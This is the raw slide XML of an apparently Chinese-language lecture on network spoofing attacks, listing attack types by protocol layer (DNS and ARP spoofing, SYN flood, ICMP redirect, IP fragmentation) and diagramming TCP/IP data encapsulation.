              <a:t>假消息（欺骗）攻击</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333375"/>
            <a:ext cx="7993062" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>假消息攻击的分类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395288" y="1484313"/>
            <a:ext cx="5976937" cy="720725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>基于网络协议层次分类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="468313" y="2276475"/>
            <a:ext cx="8135937" cy="3008313"/>
            <a:chOff x="468313" y="2276475"/>
            <a:chExt cx="8135937" cy="3008313"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54276" name="Rectangle 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468313" y="2276475"/>
              <a:ext cx="2232025" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B7C5E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zh-CN" altLang="en-US" sz="2400">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>应用层</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54277" name="Rectangle 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468313" y="2809875"/>
              <a:ext cx="2232025" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC99FF"/>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zh-CN" altLang="en-US" sz="2400">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>传输层</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54278" name="Rectangle 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468313" y="3343275"/>
              <a:ext cx="2232025" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CCFFFF"/>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zh-CN" altLang="en-US" sz="2400">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>网络层</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54279" name="Rectangle 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468313" y="3876675"/>
              <a:ext cx="2232025" cy="703263"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF99"/>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zh-CN" altLang="en-US" sz="2400">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>数据链路层</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54280" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2700338" y="2276475"/>
              <a:ext cx="5903912" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B7C5E1"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr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spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="70000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
                <a:t>DNS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
                <a:t>欺骗，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
                <a:t>SMB</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
                <a:t>中间人攻击</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54281" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2700338" y="2809875"/>
              <a:ext cx="5903912" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC99FF"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr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spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="70000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
                <a:t>SYN Flood</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
                <a:t>攻击，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
                <a:t>IP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
                <a:t>欺骗</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54282" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2700338" y="3343275"/>
              <a:ext cx="5903912" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CCFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr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spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="70000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
                <a:t>ICMP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
                <a:t>重定向攻击，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
                <a:t>IP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
                <a:t>分片攻击</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54283" name="Rectangle 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2700338" y="3876675"/>
              <a:ext cx="5903912" cy="703263"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF99"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr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lvl="1" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent1"/>
                </a:buClr>
                <a:buSzPct val="70000"/>
                <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
                <a:t>ARP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
                <a:t>欺骗</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54284" name="Rectangle 28"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468313" y="4581525"/>
              <a:ext cx="2232025" cy="703263"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="AB8181"/>
            </a:solidFill>
            <a:ln w="28575"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kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>物理层</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">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06375"/>
            <a:ext cx="8686800" cy="563563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>数据发送</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="55299" name="Group 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2438400"/>
            <a:ext cx="7848600" cy="3124200"/>
            <a:chOff x="480" y="1536"/>
            <a:chExt cx="4944" cy="1968"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55317" name="Rectangle 32"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1440" y="1536"/>
              <a:ext cx="1392" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B7C5E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b="1"/>
                <a:t>应用层</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55318" name="Rectangle 33"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1440" y="1872"/>
              <a:ext cx="1392" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC99FF"/>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b="1"/>
                <a:t>传输层</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55319" name="Rectangle 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1440" y="2208"/>
              <a:ext cx="1392" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CCFFFF"/>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b="1"/>
                <a:t>网络层</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55320" name="Rectangle 35"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1440" y="2544"/>
              <a:ext cx="1392" cy="672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF99"/>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b="1"/>
                <a:t>主机－网络层</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55321" name="Text Box 36"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="592" y="15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dirty="0"/>
                <a:t>应用程序</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55322" name="Text Box 37"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="592" y="191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操作系统</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55323" name="Text Box 38"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="592" y="229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操作系统</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55324" name="Text Box 39"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="592" y="2923"/>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t>网络设备</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55325" name="Line 40"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="480" y="3504"/>
              <a:ext cx="4944" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="sq">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6" name="Line 41"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2064" y="3216"/>
              <a:ext cx="0" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" cap="sq">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Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7562850" y="2473325"/>
            <a:ext cx="1123950" cy="34607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1600">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>应用数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6783388" y="3006725"/>
            <a:ext cx="1903412" cy="346075"/>
            <a:chOff x="4273" y="2038"/>
            <a:chExt cx="1199" cy="218"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55315" name="Text Box 44"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4764" y="2038"/>
              <a:ext cx="708" cy="218"/>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1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>应用数据</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55316" name="Text Box 45"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4273" y="2038"/>
              <a:ext cx="491" cy="218"/>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1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>TCP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>头</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6067425" y="3692525"/>
            <a:ext cx="2619375" cy="346075"/>
            <a:chOff x="3822" y="2470"/>
            <a:chExt cx="1650" cy="218"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55312" name="Text Box 47"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4764" y="2470"/>
              <a:ext cx="708" cy="218"/>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1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>应用数据</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55313" name="Text Box 48"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4273" y="2470"/>
              <a:ext cx="491" cy="218"/>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1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>TCP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>头</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55314" name="Text Box 49"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3822" y="2470"/>
              <a:ext cx="451" cy="218"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>IP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>头</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="4606925"/>
            <a:ext cx="3429000" cy="346075"/>
            <a:chOff x="3408" y="3046"/>
            <a:chExt cx="2160" cy="218"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55308" name="Text Box 51"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
